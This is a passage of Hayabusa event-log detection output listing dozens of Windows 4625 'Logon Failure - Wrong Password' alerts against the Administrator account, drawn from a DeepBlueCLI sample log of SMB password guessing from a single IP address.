NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dqyr8tb9TrO1aJNe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hI1bzjixP8eOdDbw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pMTAp20wXS3d1OCk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qrQGfxInmlgPqGtd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZcsMMQbsnUdyLJWi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8oRYZqBBsq9GyApI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0TAhib6p8fY5iOgI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FerGHj9abOe6ehZn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.362 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kN4B4KLpXbyKZzGv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HJtoyRfP38T3KToO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rkI5hLApUWhGnKIs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZCPSO4JLjMur2Eow : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VHmrv2xFuq7TyIQN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8SqYq3msNfFh24lg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YE0a2Bypzc1MMdGn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ojgIg88VK6hB72PI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ehLrf2GoAhY3Rf7Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ccfgpjwpis15B4gY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vysSf3DsOxQf5fVd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IEp88cEeiNw4IQsm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5PXDJPzw0gPdlCiH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mwoe9IgWx2UZ7Iuu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3eW0nFDUwKFzoQIw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:58.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q0i0p5QxJ4ykYYJt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VsxqWAnd6j2CdyB3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.090 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y5qdy80mtFWl199k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ce0d84uBK4t2sqR3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b4dZYZEW1VijjwHN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZmqGJWbeap5dv0gC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zaNUqChgVSbDkFQu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.319 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B4PDZ55it0V4QGnM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TQxXVB8Aj5gaw2f2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vzDeZtgSJoH74GYk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iNAFsZraFvw67WWR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0aVdnbyzWqk58rOW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WjUH2PopXCrrPzqi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ylmV2z3WjTWsTpyu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.654 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8qBKZTYRTKuEAgS8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JvekO4A5f6QK2ynZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LDUqydSeA1guOjIP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o71TltsJDyOIuLQb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NXT3MSCes42dVCNn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FGXiWeT8Evr6G70M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V2RarzrnGgcLaseH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:59.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u3k7dXu9o1vMkhby : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EDBt76dmYnPstFWw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4yjzMC7cw0fe7gjS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eQOWCM7KP68DZTX9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kn9WWWqCIwfrPbie : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AQcamLSzsXOjP6FL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.278 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6R6ZMRoYkAPB35Bq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ubqnZm0jmHNFCHrM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7ORQ8vL1oo6CkJXK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rDPl1SSddrWEs979 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VrK7fENAr1lxFr9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.633 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wu4djhEVSMYBOmjF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7e0NOdXhEkW6MskA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.715 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7nqxLHaOtkHHNAa1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NCrCf73NtEpk5DUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YVFm1epksVGO1nFY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YmVehuMHvh5kVqRW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sERZrNUHsKVEShCb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eaSNgw2hvkxLnQF8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FSYOWptgxHYTDv1x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:00.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Van1qwuRoWYPWrIY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TyLCa9OHocazZKQ2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XxrR5iUsTI9LVnLL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TxMREacN0QfvL51B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7fbzSHaZBDH4zFZZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NgIei0bMIcslJCVa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JPoKjwanczELBC5A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QOYMVAnCWB2RFYAk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k1S45GBtQ8Uoyilw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.378 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 60oeDAnU41sz1wYg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:01.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: enjlrrdf6lrm7Bao : IP Address: 192.168.198.149 : AuthPackage: 